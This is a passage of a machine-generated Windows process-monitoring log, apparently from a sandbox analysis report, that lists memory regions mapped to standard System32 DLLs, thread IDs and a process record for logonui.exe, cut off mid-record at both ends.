entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 37431 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 37432 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 37433 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37434 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37435 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37436 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37437 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37438 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37439 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37440 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37441 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37442 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37443 start_va = 0x753e0000 end_va = 0x753e7fff entry_point = 0x753e0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37450 start_va = 0x75060000 end_va = 0x75084fff entry_point = 0x75060000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37451 start_va = 0x774b0000 end_va = 0x7764cfff entry_point = 0x774b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 37452 start_va = 0x75f20000 end_va = 0x75f46fff entry_point = 0x75f20000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 37453 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 37454 start_va = 0x75f00000 end_va = 0x75f11fff entry_point = 0x75f00000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 37698 start_va = 0x77120000 end_va = 0x77154fff entry_point = 0x77120000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 37699 start_va = 0x770f0000 end_va = 0x770f5fff entry_point = 0x770f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 37700 start_va = 0x75700000 end_va = 0x7573bfff entry_point = 0x75700000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 37701 start_va = 0x75230000 end_va = 0x75234fff entry_point = 0x75230000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 37705 start_va = 0x756f0000 end_va = 0x756f5fff entry_point = 0x756f0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 37762 start_va = 0x752e0000 end_va = 0x752f5fff entry_point = 0x752e0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 37802 start_va = 0xa10000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 37803 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37804 start_va = 0x742a0000 end_va = 0x742c4fff entry_point = 0x742a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37805 start_va = 0x774b0000 end_va = 0x7764cfff entry_point = 0x774b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 37806 start_va = 0x75f20000 end_va = 0x75f46fff entry_point = 0x75f20000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 37807 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 37808 start_va = 0x75f00000 end_va = 0x75f11fff entry_point = 0x75f00000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 37814 start_va = 0x1020000 end_va = 0x105ffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 37815 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 37816 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37817 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37818 start_va = 0x11a0000 end_va = 0x11dffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 37819 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 37820 start_va = 0x1160000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 37821 start_va = 0x75060000 end_va = 0x75080fff entry_point = 0x75060000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 37822 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 37823 start_va = 0x77730000 end_va = 0x77774fff entry_point = 0x77730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 37827 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37828 start_va = 0x230000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37829 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 37830 start_va = 0x8f0000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 37831 start_va = 0x910000 end_va = 0x943fff entry_point = 0x910000 region_type = mapped_file name = "fltmgr.sys" filename = "\\Windows\\System32\\drivers\\fltMgr.sys" (normalized: "c:\\windows\\system32\\drivers\\fltmgr.sys") Region: id = 37834 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 37835 start_va = 0xa50000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 37836 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 37837 start_va = 0x40960000 end_va = 0x40970fff entry_point = 0x40960000 region_type = mapped_file name = "pshed.dll" filename = "\\Windows\\System32\\PSHED.DLL" (normalized: "c:\\windows\\system32\\pshed.dll") Region: id = 37840 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 37841 start_va = 0x910000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 37864 start_va = 0x74160000 end_va = 0x74206fff entry_point = 0x74160000 region_type = mapped_file name = "adtschema.dll" filename = "\\Windows\\System32\\adtschema.dll" (normalized: "c:\\windows\\system32\\adtschema.dll") Region: id = 37865 start_va = 0x11e0000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 37911 start_va = 0x74200000 end_va = 0x7420dfff entry_point = 0x74200000 region_type = mapped_file name = "microsoft-windows-kernel-power-events.dll" filename = "\\Windows\\System32\\microsoft-windows-kernel-power-events.dll" (normalized: "c:\\windows\\system32\\microsoft-windows-kernel-power-events.dll") Region: id = 37912 start_va = 0x74200000 end_va = 0x74206fff entry_point = 0x74200000 region_type = mapped_file name = "microsoft-windows-kernel-processor-power-events.dll" filename = "\\Windows\\System32\\microsoft-windows-kernel-processor-power-events.dll" (normalized: "c:\\windows\\system32\\microsoft-windows-kernel-processor-power-events.dll") Region: id = 37913 start_va = 0x990000 end_va = 0x9d0fff entry_point = 0x990000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 37914 start_va = 0x75340000 end_va = 0x75388fff entry_point = 0x75340000 region_type = mapped_file name = "umpnpmgr.dll" filename = "\\Windows\\System32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll") Region: id = 37932 start_va = 0x1110000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 37933 start_va = 0x74250000 end_va = 0x742c9fff entry_point = 0x74250000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 37934 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37935 start_va = 0x74220000 end_va = 0x74244fff entry_point = 0x74220000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37936 start_va = 0x774b0000 end_va = 0x7764cfff entry_point = 0x774b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 37937 start_va = 0x75f20000 end_va = 0x75f46fff entry_point = 0x75f20000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 37938 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 37939 start_va = 0x75f00000 end_va = 0x75f11fff entry_point = 0x75f00000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 37940 start_va = 0x74770000 end_va = 0x747a8fff entry_point = 0x74770000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 37941 start_va = 0x74ac0000 end_va = 0x74bb4fff entry_point = 0x74ac0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 37942 start_va = 0x74210000 end_va = 0x74216fff entry_point = 0x74210000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 37943 start_va = 0x12e0000 end_va = 0x13dffff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 37944 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 37945 start_va = 0xfb0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 37946 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 37947 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 37948 start_va = 0x930000 end_va = 0x930fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 37995 start_va = 0x14a0000 end_va = 0x14dffff entry_point = 0x0 region_type = private name = "private_0x00000000014a0000" filename = "" Region: id = 37996 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37997 start_va = 0x940000 end_va = 0x940fff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 37998 start_va = 0x9e0000 end_va = 0x9e0fff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 38001 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 38002 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 38005 start_va = 0x9f0000 end_va = 0x9f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 38006 start_va = 0x1420000 end_va = 0x145ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 38007 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 38395 start_va = 0x74090000 end_va = 0x74122fff entry_point = 0x74090000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 38404 start_va = 0x74050000 end_va = 0x7407afff entry_point = 0x74050000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 38405 start_va = 0x74160000 end_va = 0x741e7fff entry_point = 0x74160000 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 38435 start_va = 0x72a10000 end_va = 0x72b4dfff entry_point = 0x72a10000 region_type = mapped_file name = "comres.dll" filename = "\\Windows\\System32\\comres.dll" (normalized: "c:\\windows\\system32\\comres.dll") Region: id = 38555 start_va = 0xfb0000 end_va = 0xff3fff entry_point = 0xfb0000 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 38556 start_va = 0x1010000 end_va = 0x1057fff entry_point = 0x1010000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 38557 start_va = 0x14e0000 end_va = 0x16dffff entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 38558 start_va = 0xfb0000 end_va = 0xff7fff entry_point = 0xfb0000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 38797 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 38847 start_va = 0x1800000 end_va = 0x183ffff entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 38848 start_va = 0x711e0000 end_va = 0x711e7fff entry_point = 0x711e0000 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 38849 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 38850 start_va = 0x72b60000 end_va = 0x72b7bfff entry_point = 0x72b60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 38851 start_va = 0x72b50000 end_va = 0x72b56fff entry_point = 0x72b50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 38852 start_va = 0x711d0000 end_va = 0x711d5fff entry_point = 0x711d0000 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Thread: id = 1112 os_tid = 0x2b4 Thread: id = 1114 os_tid = 0x2c0 Thread: id = 1117 os_tid = 0x2c8 Thread: id = 1118 os_tid = 0x2d0 Thread: id = 1119 os_tid = 0x2d4 Thread: id = 1124 os_tid = 0x2e8 Thread: id = 1125 os_tid = 0x2ec Thread: id = 1143 os_tid = 0x33c Thread: id = 1144 os_tid = 0x340 Thread: id = 1145 os_tid = 0x344 Thread: id = 1146 os_tid = 0x348 Thread: id = 1148 os_tid = 0x350 Thread: id = 1162 os_tid = 0x38c Thread: id = 1163 os_tid = 0x390 Thread: id = 1164 os_tid = 0x394 Thread: id = 1167 os_tid = 0x3a4 Thread: id = 1169 os_tid = 0x3ac Thread: id = 1229 os_tid = 0x4b0 Process: id = "673" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x7f1d1180" os_pid = "0x2fc" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "666" os_parent_pid = "0x184" cmd_line = "\"LogonUI.exe\" /flags:0x0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 37467 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 37468 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 37469 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 37470 start_va = 0x840000 end_va = 0x845fff entry_point = 0x840000 region_type = mapped_file name = "logonui.exe" filename = "\\Windows\\System32\\LogonUI.exe" (normalized: "c:\\windows\\system32\\logonui.exe") Region: id = 37471 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 37472 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 37473 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 37474 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37475 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 37477 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 37478 start_va = 0xb0000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 37479 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 37480 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 37481 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 37482 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 37483 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 37484 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 37485 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 37486 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 37487 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 37488 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 37489 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 37490 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 37491 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37492 start_va = 0x390000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 37493 start_va = 0x50000 end_va = 0x6cfff entry_point = 0x50000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37494 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 37495 start_va = 0x50000 end_va = 0x6cfff entry_point = 0x50000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37496 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37497 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37498 start_va = 0x50000 end_va = 0x6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 37499 start_va = 0x390000 end_va = 0x490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 37500 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 37501 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37502 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 37503 start_va = 0x200000 end_va = 0x25bfff entry_point = 0x200000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37504 start_va = 0x200000 end_va = 0x25bfff entry_point = 0x200000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37505 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37506 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 37507 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 37508 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37509 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 37510 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 37511 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 37512 start_va = 0x74ea0000 end_va = 0x75056fff entry_point = 0x74ea0000 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 37515 start_va = 0x220000 end_va = 0x221fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 37516 start_va = 0x74da0000 end_va = 0x74e97fff entry_point = 0x74da0000 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 37518 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 37519 start_va = 0x75d90000 end_va = 0x75eacfff entry_point = 0x75d90000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 37520 start_va = 0x75cc0000 end_va = 0x75ccbfff entry_point = 0x75cc0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 37521 start_va = 0x74c00000 end_va = 0x74d9dfff entry_point = 0x74c00000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 37522 start_va = 0x771b0000 end_va = 0x77206fff entry_point = 0x771b0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 37523 start_va = 0x240000 end_va = 0x240fff entry_point = 0x240000 region_type = mapped_file name = 